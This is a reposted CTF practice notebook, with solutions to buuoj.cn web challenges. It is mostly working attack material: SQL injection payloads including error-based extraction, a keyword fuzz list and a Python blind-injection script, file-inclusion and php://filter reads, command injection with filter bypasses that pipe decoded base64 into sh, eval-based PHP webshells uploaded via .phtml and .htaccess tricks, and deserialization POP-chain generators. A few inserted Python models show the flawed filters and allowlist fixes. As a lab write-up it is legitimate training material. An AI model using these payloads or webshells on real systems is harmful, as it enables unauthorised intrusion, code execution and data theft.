CTF practice - buuoj.cn
WEB
buuoj.cn-[极客大挑战 2019]EasySQL
Universal payloads:
1 and 1=1
1' and '1'='1
1 or 1=1
1' or '1'='1
http://43ffd150-ad6f-4a6f-bfe1-09e4486466fd.node4.buuoj.cn:81/check.php?username=1'or '1'='1&password=1'or '1'='1
[极客大挑战 2019]Havefun
Right-click to view the page source:
<!--
    $cat=$_GET['cat'];
    echo $cat;
    if($cat=='dog'){
        echo 'Syc{cat_cat_cat_cat}';
    }
-->
http://1c4bde13-b1bc-47b9-a000-2a2ab8f02b70.node4.buuoj.cn:81/?cat=dog
[HCTF 2018]WarmUp
A simple PHP code audit.
<?php
highlight_file(__FILE__);
class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}

if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
payload:
62704325-c9b0-4e15-bdad-cc1495651f9c.node4.buuoj.cn:81/?file=hint.php?../../../../../../../../ffffllllaaaagggg
Reference:
https://blog.csdn.net/qq_63548648/article/details/128067255
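Python model of the checkFile() logic above, added here as an illustration (it is not the challenge's code). It shows why the payload works: the whitelist decision is made on the string truncated at the first `?`, while `include` receives the untruncated value. `check_file_hardened` is an assumed fix, not part of the challenge: the whole input must be a whitelist key and only the mapped filename is ever included.

```python
from urllib.parse import unquote_plus

# Whitelist copied from the challenge source
WHITELIST = {"source": "source.php", "hint": "hint.php"}


def _before_query(s: str) -> str:
    """mb_substr($s, 0, mb_strpos($s . '?', '?')): keep everything before the first '?'."""
    return s[: (s + "?").find("?")]


def check_file_original(page) -> bool:
    """Same decision sequence as emmm::checkFile(); True means include() would run
    on the ORIGINAL, untruncated value of page."""
    if not isinstance(page, str):
        return False
    if page in WHITELIST.values():                                # exact match
        return True
    if _before_query(page) in WHITELIST.values():                 # truncated at first '?'
        return True
    if _before_query(unquote_plus(page)) in WHITELIST.values():   # urldecode, then truncate
        return True
    return False


def check_file_hardened(page):
    """Assumed hardening (not the challenge's code): the entire input must equal a
    whitelist key; return the mapped file to include, or None to refuse."""
    if not isinstance(page, str):
        return None
    return WHITELIST.get(page)
```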
[ACTF2020 新生赛]Include
File inclusion:
http://feadec16-bcf9-4fcf-a5e0-0df54c397f7b.node4.buuoj.cn:81/?file=php://filter/convert.base64-encode/resource=flag.php
index.php source:
<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
    exit('hacker!');
}
if($file){
    include($file);
}else{
    echo '<a href="?file=flag.php">tips</a>';
}
?>
File inclusion reference:
https://www.anquanke.com/post/id/248627#h3-11
[ACTF2020 新生赛]Exec
Command execution:
127.0.0.1;cat /flag
[GXYCTF2019]Ping Ping Ping
http://a37a6ef7-4016-40f4-91e2-e6d51c6a6d52.node4.buuoj.cn:81/?ip=127.0.0.1|cat$IFS$1index.php
index.php source:
<?php
if(isset($_GET['ip'])){
    $ip = $_GET['ip'];
    if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
        echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
        die("fxck your symbol!");
    } else if(preg_match("/ /", $ip)){
        die("fxck your space!");
    } else if(preg_match("/bash/", $ip)){
        die("fxck your bash!");
    } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
        die("fxck your flag!");
    }
    $a = shell_exec("ping -c 4 ".$ip);
    echo "<pre>";
    print_r($a);
}
?>
Method 1:
Variable concatenation:
http://a37a6ef7-4016-40f4-91e2-e6d51c6a6d52.node4.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
Method 2:
base64-encoded bypass:
echo "cat flag.php"|base64
Generated base64: Y2F0IGZsYWcucGhwCg==
http://a37a6ef7-4016-40f4-91e2-e6d51c6a6d52.node4.buuoj.cn:81/?ip=127.0.0.1|echo$IFS$1Y2F0IGZsYWcucGhwCg==$IFS$1|$IFS$1base64$IFS$1-d$IFS$1|$IFS$1sh
Reference articles on command-execution bypass techniques:
https://blog.csdn.net/m0_64815693/article/details/127268809
http://www.360doc.com/content/21/0909/17/71923083_994810060.shtml
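Python re-implementation of the four filters in the index.php above, added as an illustration (not the challenge's code), beside an allowlist check assumed as the fix. The payloads from this section pass the blocklist and fail the allowlist, which is the defender's takeaway: validate the parameter as an IP literal instead of enumerating bad characters.

```python
import ipaddress
import re

# The first preg_match() as PHP's double-quoted string parser leaves it: "\\" collapses
# to one backslash, so the tail reads ...|"|\|\(|\)|...: only the two-character
# sequence "|(" and a lone ")" are rejected, while a bare "|" (and ";" or "$", which
# were never listed) get through. That is what the $IFS$1 payloads above rely on.
SYMBOLS = re.compile(r"""[&/?*<\x00-\x1f>'")\[\]{}]|\|\(""")


def blocklist_allows(ip: str) -> bool:
    """Mirror of the four die() checks in the challenge's index.php."""
    if SYMBOLS.search(ip):
        return False
    if " " in ip:                              # preg_match("/ /")
        return False
    if "bash" in ip:                           # preg_match("/bash/")
        return False
    if re.search(r"f.*l.*a.*g", ip):           # preg_match("/.*f.*l.*a.*g.*/")
        return False
    return True


def allowlist_allows(ip: str) -> bool:
    """Assumed hardening (not the challenge's code): accept only a syntactically valid
    IPv4/IPv6 literal, so nothing shell-significant can reach shell_exec()."""
    try:
        ipaddress.ip_address(ip)
    except ValueError:
        return False
    return True
```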
[SUCTF 2019]EasySQL
Method 1:
1;set sql_mode=PIPES_AS_CONCAT;select 1
Method 2:
*,1
[极客大挑战 2019]Secret File
Simple file inclusion.
http://b0072723-9ac4-4df9-a175-77d60e59735a.node4.buuoj.cn:81/Archive_room.php
Capture the request with Burp Suite:
/secr3t.php
Simple PHP file inclusion:
/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
[极客大挑战 2019]LoveSQL
Note: URL-encode # as %23.
/check.php?username=1' union select 1,database(),version()%23&password=1
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
[极客大挑战 2019]Http
Modify the HTTP request headers:
X-Forwarded-For: 127.0.0.1
Referer: https://Sycsecret.buuoj.cn
User-Agent: "Syclover" browser
Request headers sent:
GET /Secret.php HTTP/1.1
Host: node4.buuoj.cn:26614
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Referer: https://Sycsecret.buuoj.cn
User-Agent: "Syclover" browser
[极客大挑战 2019]Knife
A no-brainer: connect straight to it with Caidao (菜刀) or any other webshell management tool.
[极客大挑战 2019]Upload
File header (magic bytes) bypass:
GIF89a
Extension bypass with .phtml:
Content-Disposition: form-data; name="file"; filename="flag.phtml"
Content-Type: image/png
GIF89a
<script language='php'>@eval($_POST[shell]);</script>
Webshell path: upload/flag.phtml
[ACTF2020 新生赛]Upload
Upload a .phtml file:
POST / HTTP/1.1
Host: 684e6a4c-d084-42d7-b3c7-419234cc452a.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------145469643534879765234084248244
Content-Length: 402
Origin: http://684e6a4c-d084-42d7-b3c7-419234cc452a.node4.buuoj.cn:81
Connection: close
Referer: http://684e6a4c-d084-42d7-b3c7-419234cc452a.node4.buuoj.cn:81/
Upgrade-Insecure-Requests: 1
-----------------------------145469643534879765234084248244
Content-Disposition: form-data; name="upload_file"; filename="1111.phtml"
Content-Type: image/jpeg
<script language='php'>@eval($_POST[shell]);</script>
-----------------------------145469643534879765234084248244
Content-Disposition: form-data; name="submit"
upload
-----------------------------145469643534879765234084248244--
[极客大挑战 2019]BabySQL
Double-writing bypass (the filter strips each keyword once, so ununionion becomes union):
username=admin&password=123456' ununionion selselectect 1,2,3 %23
username=admin&password=123456' ununionion selselectect 1,2,database() %23
username=admin&password=123456' ununionion selselectect 1,2,group_concat(schema_name) from information_schema.schemata %23
admin&password=123456' ununionion selselectect 1,2,group_concat(schema_name) frfromom (infoorrmation_schema.schemata) %23
username=admin&password=123456' ununionion selselectect 1,2,group_concat(table_name) frfromom (infoorrmation_schema.tables) whwhereere table_schema='ctf' %23
username=admin&password=123456' ununionion selselectect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_schema='ctf' and table_name='Flag' %23
username=admin&password=123456' ununionion selselectect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_schema='ctf' aandnd table_name='Flag' %23
username=admin&password=123456' ununionion selselectect 1,2,flag frfromom ctf.Flag %23
[极客大挑战 2019]PHP
A deserialization challenge.
Key points: site backup file + __wakeup bypass.
Note the characters that look like spaces in the serialized private property names: they are null bytes, so encode them as %00.
http://bc2f74ae-5a22-4516-91f4-c0a3620d0016.node4.buuoj.cn:81/?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
Reference: https://blog.csdn.net/qq_58166735/article/details/128248384
[ACTF2020 新生赛]BackupFile
Key points: finding backup files + PHP loose type comparison
Backup file: index.php.bak
http://89295bcb-1c0e-4e2b-a068-42add2e5e913.node4.buuoj.cn:81/index.php?key=123
[RoarCTF 2019]Easy Calc
Viewing phpinfo shows that most functions are disabled.
Use var_dump() and scandir() to work around it:
? num=var_dump(scandir(chr(47)))
num=file_get_contents(/f1agg) is converted to:
num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
Use Python to convert the string into chr() calls, bypassing the WAF's restriction on letters and digits:
str1 = "/f1agg"
flag = ""
for char in str1:
    flag += "chr(" + str(ord(char)) + ")."
print(flag.rstrip('.'))
Reference:
https://blog.csdn.net/m0_62905261/article/details/127027095
[极客大挑战 2019]BuyFlag
Key point: bypassing is_numeric()
Source:
if (isset($_POST['password'])) {
    $password = $_POST['password'];
    if (is_numeric($password)) {
        echo "password can't be number</br>";
    }elseif ($password == 404) {
        echo "Password Right!</br>";
    }
}
POST /pay.php HTTP/1.1
Host: 446f2935-4a7a-4da6-accf-a706b6f11595.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: user=1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
password=404e&money[]=a
[BJDCTF2020]Easy MD5
Key points: md5 array bypass, hash collision bypass, loose type comparison bypass.
Reference:
https://blog.csdn.net/qq_63548648/article/details/128144485
[护网杯 2018]easy_tornado
Key point: template injection
Reference: https://blog.csdn.net/qq_51927659/article/details/116031923
[HCTF 2018]admin
Key points: Unicode spoofing, Flask session forgery, race condition
https://blog.csdn.net/qq_63928796/article/details/125637749
[MRCTF2020]你传你🐎呢
Key points: file upload, exploiting an .htaccess file
.htaccess file:
<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>
Upload any image (named 1.png so the .htaccess rule applies), turn it into PHP by writing a one-line webshell into it, connect with a shell tool, and you get the flag.
[ZJCTF 2019]NiZhuanSiWei
Key points: PHP stream wrappers (pseudo-protocols), PHP deserialization
http://d725a3cd-5e90-48b6-ac58-f7b643407b5e.node4.buuoj.cn:81/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:%22Flag%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D
Reference: https://blog.csdn.net/wo41ge/article/details/109705195
[MRCTF2020]Ezpop
Key point: constructing a POP chain for a deserialization vulnerability
Source:
<?php
//flag is in flag.php
class Modifier {
    protected $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}
payload:
<?php
class Modifier {
    protected $var="php://filter/read=convert.base64-encode/resource=flag.php";
}
class Test{
    public $p;
}
class Show{
    public $source;
    public $str;
}
$pop = new Show();
$pop->source = new Show();
$pop->source->str = new Test();
$pop->source->str->p = new Modifier();
echo urlencode(serialize($pop));
?>
[极客大挑战 2019]HardSQL
Key points: SQL injection filter bypass, fuzzing SQL keywords
Fuzz dictionary:
^
&
&&
|
||
and
And
anandd
AnanDd
or
Or
oorr
union
uNIon
ununionion
UnunionIOn
substr
length
ascii
=
>
/**/
(
)
<
select
selselect
SeleCT
updatexml
extractvalue
floor
limit
select
selselectect
concat
group
by
order
information_schema
tables
where
left
right
regexp
Use error-based injection.
Extract the database name:
1'or(extractvalue(1,concat(0x7e,(select(database())),0x7e)))#
Extract the table names:
1'or(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek')),0x7e)))#
Extract the column names:
1'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e)))#
Extract the flag value:
1'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)),0x7e)))#
Extract the flag value again with right() to read the remaining part (extractvalue() only shows 32 characters of the error message):
1'or(extractvalue(1,concat(0x7e,(select(right(password,20))from(H4rDsq1)),0x7e)))#
Or brute-force it character by character with Python:
import requests
import time

# Uppercase letters were left out; add ABCDEFGHIJKLMNOPQRSTUVWXYZ by hand if needed
# No stop condition was written: stop once the last character of strings has been tried without extending the flag
strings = 'abcdefghijklmnopqrstuvwxyz1234567890{}-_~'
i = 1
flag = ''
while i < 80:
    for one_char in strings:
        one_char = flag + one_char
        # regexp('^<prefix>') on the password column: the error message contains 'flag' only when the prefix matches
        url = "http://f3c46938-d2a9-478f-90d3-bf91cbacee62.node4.buuoj.cn:81/check.php?username=12&password=1%27or%28extractvalue%281%2Cconcat%280x7e%2C%28select%28password%29from%28H4rDsq1%29where%28password%29regexp%28%27%5E"+str(one_char)+"%27%29%29%2C0x7e%29%29%29%23"
        time.sleep(0.05)
        rs = requests.get(url)
        if 'flag' in rs.text:
            flag = one_char
            print("\r", end="")
            print('flag: ' + flag, end='')
            break
    i += 1  # bound the outer loop; the original never advanced i
Reference:
https://www.cnblogs.com/upfine/p/16578800.html
[MRCTF2020]Ez_bypass
Key point: PHP loose type comparison
POST /index.php?id[]=1&gg[]=2 HTTP/1.1
Host: 96e1d642-96c0-4702-ba21-dd06bd7dbebf.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 20
Content-Type: application/x-www-form-urlencoded
passwd=1234567nonono
[网鼎杯 2020 青龙组]AreUSerialz
Key points:
1. file_get_contents() can read through the php://filter wrapper.
2. Serialized protected/private properties contain non-printable characters; public ones do not.
3. PHP 7.1+ is not sensitive to a class's property visibility when unserializing.
4. Strict vs loose comparison: "===" vs "==".
<?php
class FileHandler {
    public $op=2;
    public $filename="php://filter/read=convert.base64-encode/resource=flag.php";
    public $content;
}
$a = new FileHandler();
echo serialize($a);
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}
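Minimal Python model of PHP's serialize() for objects, added here as an illustration (it is not PHP's implementation). It covers both the [极客大挑战 2019]PHP payload earlier on this page (private properties, hence the %00 bytes) and the FileHandler output just above; only the scalar types used on this page, the visibility name-mangling and the property count in the header are modelled.

```python
from urllib.parse import quote


def _ser(v) -> str:
    """Serialize the scalar types that appear on this page (None, bool, int, str)."""
    if v is None:
        return "N;"
    if isinstance(v, bool):
        return f"b:{int(v)};"
    if isinstance(v, int):
        return f"i:{v};"
    if isinstance(v, str):
        return f's:{len(v.encode("utf-8"))}:"{v}";'   # PHP counts bytes, not characters
    raise TypeError(f"unsupported type {type(v).__name__}")


def php_serialize_object(cls: str, props, declared_count=None) -> str:
    """props: iterable of (name, visibility, value), visibility in public/protected/private.
    Protected names are mangled to "\\0*\\0name" and private ones to "\\0Class\\0name";
    those NUL bytes are the non-printable characters that public properties lack.
    declared_count overrides the property count in the header: the __wakeup bypass
    used on this page declares more properties than are actually present."""
    props = list(props)
    body = []
    for name, vis, value in props:
        if vis == "protected":
            key = f"\x00*\x00{name}"
        elif vis == "private":
            key = f"\x00{cls}\x00{name}"
        else:
            key = name
        body.append(_ser(key) + _ser(value))
    n = len(props) if declared_count is None else declared_count
    inner = "".join(body)
    return f'O:{len(cls)}:"{cls}":{n}:{{{inner}}}'


def url_encoded(payload: str) -> str:
    """Percent-encode everything, so the NUL bytes show up as %00 as in the page's URLs."""
    return quote(payload, safe="")
```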
[SUCTF 2019]CheckIn
Key point: upload bypass
Content-Type: application/octet-stream
GIF89a
auto_prepend_file=test2.gif
Content-Type: image/gif
GIF89a
<script language='php'>eval($_GET['cmd'])</script>
Some command-execution functions:
# Code: <script language="php">eval($_GET[cmd]);</script>
# eval(): evaluates a string as PHP code; eval itself has no command-execution capability and can only run PHP functions and code.
# Note:
# eval() cannot execute code that contains the "<?php ?>" opening/closing tags; apart from that, the input must be valid PHP code, and every statement must end with a semicolon.
# Common PHP filesystem functions
scandir: lists the files and directories at the given path
getcwd: gets the current working directory
chdir: changes the current directory
# PHP command-execution functions
system: executes an external program and displays its output
exec: executes an external program
passthru: executes an external program and displays its raw output
var_dump(scandir("/"));
system("cat /flag");
Reference:
https://blog.csdn.net/qq_45925514/article/details/125085474
[GXYCTF2019]BabyUpload
Key point: exploiting an .htaccess file
<FilesMatch "1.jpeg">
    SetHandler application/x-httpd-php
</FilesMatch>
GIF89a?
[GXYCTF2019]BabySQli
Key point: using a UNION query to construct fake row data
payload:
name=1'+union+select+1,'admin','202cb962ac59075b964b07152d234b70'#&pw=123
This post is from cnblogs (博客园), author: admax11; when reposting, please cite the original link: https://www.cnblogs.com/ctfisnull/p/17505368.html